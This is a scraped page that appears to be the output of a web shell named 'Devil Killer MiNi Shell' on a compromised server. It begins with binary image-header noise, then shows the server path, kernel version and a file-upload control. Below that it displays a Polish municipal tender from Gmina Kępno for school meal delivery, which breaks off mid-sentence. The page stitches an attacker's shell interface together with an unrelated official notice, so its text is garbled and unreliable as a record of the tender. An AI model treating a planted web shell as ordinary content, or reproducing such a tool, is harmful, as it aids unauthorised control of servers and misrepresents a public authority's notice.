JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211230/0033825601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz posiłków do szkół podstawowych i przedszkoli na terenie Gminy Kępno przy użyciu środków transportu, przystosowanych do przewozu żywności oraz odwozu pustych pojemników – II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kępno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 250854731</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ratuszowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kępno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL416 - Kaliski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">625909400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">625909402</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kepno@um.kepno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kepno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz posiłków do szkół podstawowych i przedszkoli na terenie Gminy Kępno przy użyciu środków transportu, przystosowanych do przewozu żywności oraz odwozu pustych pojemników – II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-94ed11da-688b-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00338256</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000395/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Dowóz posiłków do szkół podstawowych i przedszkoli na terenie Gminy Kępno przy użyciu środków transportu, przystosowanych do przewozu żywności oraz odwozu pustych pojemników w 2022 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/kepno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/kepno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwemplatformazakupowa.pl pod adresem https://platformazakupowa.pl/kepno3. Preferuje się,<br/>abykomunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia,<br/>wnioski,zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwemplatformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. 4.<br/>Zamawiający będzieprzekazywał wykonawcom informacje w formie elektronicznej za<br/>pośrednictwemplatformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmianyterminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w<br/>sekcji“Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretnywykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl dokonkretnego wykonawcy.5. Zamawiający, zgodnie z Rozporządzeniem<br/>Prezesa Rady Ministrów z dnia30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagańtechnicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej wpostępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz.<br/>2452), określaniezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:a.stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s,b. komputerklasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jegonowsza wersja, jeden z systemów operacyjnych - MS Windows<br/>7, Mac Os x 10 4, Linux, lub ichnowsze wersje,c. zainstalowana dowolna przeglądarka internetowa, w<br/>przypadku Internet Explorerminimalnie wersja 10 0.,d. włączona obsługa JavaScript,e. zainstalowany program Adobe AcrobatReader lub inny obsługujący format plików .pdf,f. Platformazakupowa.pl działa<br/>według standarduprzyjętego w komunikacji sieciowej - kodowanie UTF8,g. Oznaczenie czasu odbioru<br/>danych przezplatformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany<br/>wgczasulokalnegoserwera synchronizowanego z zegarem Głównego Urzędu Miar.7. Wykonawca,<br/>przystępując<br/>doniniejszego postępowania o udzielenie zamówienia publicznego: akceptuje warunki korzystania<br/>zplatformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem<br/>wzakładce „Regulamin&#34; oraz uznaje go za wiążący, zapoznał i stosuje się do Instrukcji<br/>składaniaofert/wniosków dostępnej pod linkiem. 8. Zamawiający nie ponosi odpowiedzialności za<br/>złożenie ofertyw sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności<br/>za sytuację, gdyzamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np.<br/>złożenie oferty wzakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez<br/>Zamawiającegoza ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu<br/>ponieważ nie zostałspełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień<br/>Publicznych.9. Zamawiającyinformuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w<br/>szczególności logowania,składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanychw niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się<br/>w zakładce „Instrukcje dlaWykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje10. W korespondencji kierowanej do Zamawiającego<br/>Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13<br/>ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>danych) (Dz. U. UE L119 z dnia 4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:1)<br/>administratorem Pani/Pana danych osobowych jestBurmistrz Miasta i Gminy Kępno z siedzibą w<br/>Kępnie, przy ul. Ratuszowa 1, 63-600 Kępno, tel.625909404, e-mail kępno@um.kepno.pl;2)<br/>administrator wyznaczył Inspektora Danych Osobowych, zktórym można się kontaktować pod adresem<br/>e-mail: zofia.siubiak@um.kepno.pl 3) Pani/Pana daneosobowe przetwarzane będą na podstawie art. 6<br/>ust. 1 lit. c RODO w celu związanym zprzedmiotowym postępowaniem o udzielenie zamówienia<br/>publicznego, prowadzonym w trybie podstawowym bez negocjacji. 4) odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty,którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy P.Z.P.5)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78<br/>ust. 1 P.Z.P. przez okres 4 lat oddnia zakończenia postępowania o udzielenie zamówienia, a jeżeli<br/>czas trwania umowy przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;6)<br/>obowiązek podania przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowymokreślonym w przepisanych ustawy P.Z.P., związanym z udziałem w<br/>postępowaniu o udzieleniezamówienia publicznego.7) w odniesieniu do Pani/Pana danych osobowych<br/>decyzje nie będąpodejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8) posiada<br/>Pani/Pan:a) napodstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku,gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłkumoże zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celusprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonegopostępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy wzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników);c) na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust.<br/>2RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania,<br/>w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;9) nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo<br/>do usunięciadanych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO;c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyżpodstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10)przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODOprzetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym<br/>dlaprzedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WR.271.33.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 173413,82 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 78824,39 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1. Przedmiotem zamówienia jest Dowóz posiłków do szkół podstawowych i przedszkoli na terenie Gminy Kępno przy użyciu środków transportu, przystosowanych do przewozu żywności oraz odwozu pustych pojemników.<br/>Wykonawcy przysługiwać będzie wynagrodzenie za faktycznie wykonaną trasę przejazdu. <br/>UWAGA! W dzienny przebieg kilometrów nie są wliczone dojazdy z siedziby Wykonawcy do miejsca rozpoczęcia kursu i jego zakończenia.<br/>Szczegółowy zakres zamówienia tj. w szczególności godziny realizacji zadania, miejsce przejazdu, cel przejazdu, ilość kilometrów poszczególnych odcinków oraz przewidywaną ilość termosów określa „Szczegółowy opis przedmiotu zamówienia” (załącznik nr 6) <br/>Ilość dni związanych z dowozem posiłków do szkół i przedszkoli - 105 (szkoły i przedszkola – 98 dni, tylko dowóz posiłków do przedszkoli – 7 dni); <br/>1.2.	CPV<br/>60100000-9	Usługi w zakresie transportu drogowego<br/><br/>1.3 Zamawiający nie dopuszcza składania ofert częściowych. <br/>1.4	Zamawiający nie przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 Pzp.<br/>1.5	Zamawiający nie przewiduje zawarcia umowy ramowej, o której mowa w art. 311–315 ustawy Pzp.<br/>1.6	Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej, o której mowa w art. 308 ust. 1 ustawy Pzp.<br/>1.7	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu<br/>1.8	Zamawiający przewiduje nie przewiduje rozliczenia w walutach obcych<br/>1.9	Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych. ani dołączenia katalogów elektronicznych do ofert, w sytuacji określonej w art. 93 Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1) Cena (C) – waga kryterium 60%;<br/>2) Termin płatności faktury – waga kryterium 40%.<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 60%<br/>cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60%<br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez<br/>Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z<br/>realizacją przedmiotu zamówienia.<br/>2) Termin płatności faktury – waga 40%<br/>Ofercie zostaną przyznane punkty w sposób wskazany poniżej:<br/>14- dniowy termin płatności – 0 pkt. 15- dniowy termin płatności – 2,5pkt.<br/>16- dniowy termin płatności – 5,0 pkt. 17- dniowy termin płatności – 7,5 pkt.<br/>18- dniowy termin płatności –10, 0 pkt. 19- dniowy termin płatności – 12,5 pkt.<br/>20- dniowy termin płatności – 15,0 pkt. 21- dniowy termin płatności – 17,5 pkt.<br/>22- dniowy termin płatności –20,0 pkt. 23- dniowy termin płatności – 22,5 pkt.<br/>24- dniowy termin płatności –25,0 pkt. 25- dniowy termin płatności – 27,5 pkt.<br/>26- dniowy termin płatności –30,0 pkt. 27- dniowy termin płatności – 32,5 pkt.<br/>28- dniowy termin płatności –35,0 pkt. 29- dniowy termin płatności – 37,5 pkt.<br/>30- dniowy termin płatności – 40,0 pkt.<br/>Jeżeli termin płatności podany przez Wykonawcę będzie dłuższy niż 30 dni, dla oceny ofert<br/>Zamawiający przyjmuje termin płatności równy 30 dni.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści<br/>złożonej oferty, w tym zaoferowanej ceny.<br/>3. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert<br/>uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu.4. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia<br/>ten sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z<br/>niższą ceną.<br/>5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących<br/>treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są<br/>zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeżeli Wykonawca<br/>wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>działalności jest krótszy - w tym okresie, wykonał co najmniej 1 usługę przewozu żywności<br/>trwającą min. 3 miesiące (umowa na okres min. 3 miesiące). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych, które Wykonawca składa w postępowaniu na wezwanie<br/>Zamawiającego na potwierdzenie braku podstaw do wykluczenia z postępowania:1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 10 pkt 4 Pzp, sporządzone nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych, które Wykonawca składa w<br/>postępowaniu na wezwanie Zamawiającego na potwierdzenie spełniania warunków udziału w<br/>postępowaniu:<br/>1) Wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ilości, przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane; wzór wykazu usług stanowi<br/>Załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo 